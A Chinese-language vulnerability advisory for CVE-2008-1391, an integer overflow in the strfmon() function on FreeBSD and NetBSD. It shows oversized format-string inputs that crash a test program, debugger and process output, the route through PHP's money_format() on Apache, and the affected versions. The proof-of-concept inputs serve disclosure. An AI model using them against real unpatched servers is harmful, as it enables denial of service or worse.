BUGTRAQ ID: 28479
CVE ID:CVE-2008-1391
CNCVE ID:CNCVE-20081391
多个BSD平台’strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。
问题代码类似如下:
#include <monetary.h>
ssize_t
strfmon(char * restrict s, size_t maxsize, const char *
restrict format,
…);
并编译,可操作如下格式串:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
问题如下:
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove()会重分配内存。
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
下个例子是:
cxib# ./pln %#99999999999999999999n
Long execution time. Let’s try check this process :
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336
pln会分配更多的内存,PHP在money_format()函数中使用strfmon(),当我们在Apache中使用mod_php5,我们可以建立如下利用方法,结果如下:
NetBSD NetBSD 4.0
FreeBSD FreeBSD 6.0 .x
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.0 -RELEASE-p5
可联系供应商获得补丁信息:
<a href=“http://www.netbsd.org/” target=“_blank”>http://www.netbsd.org/</a>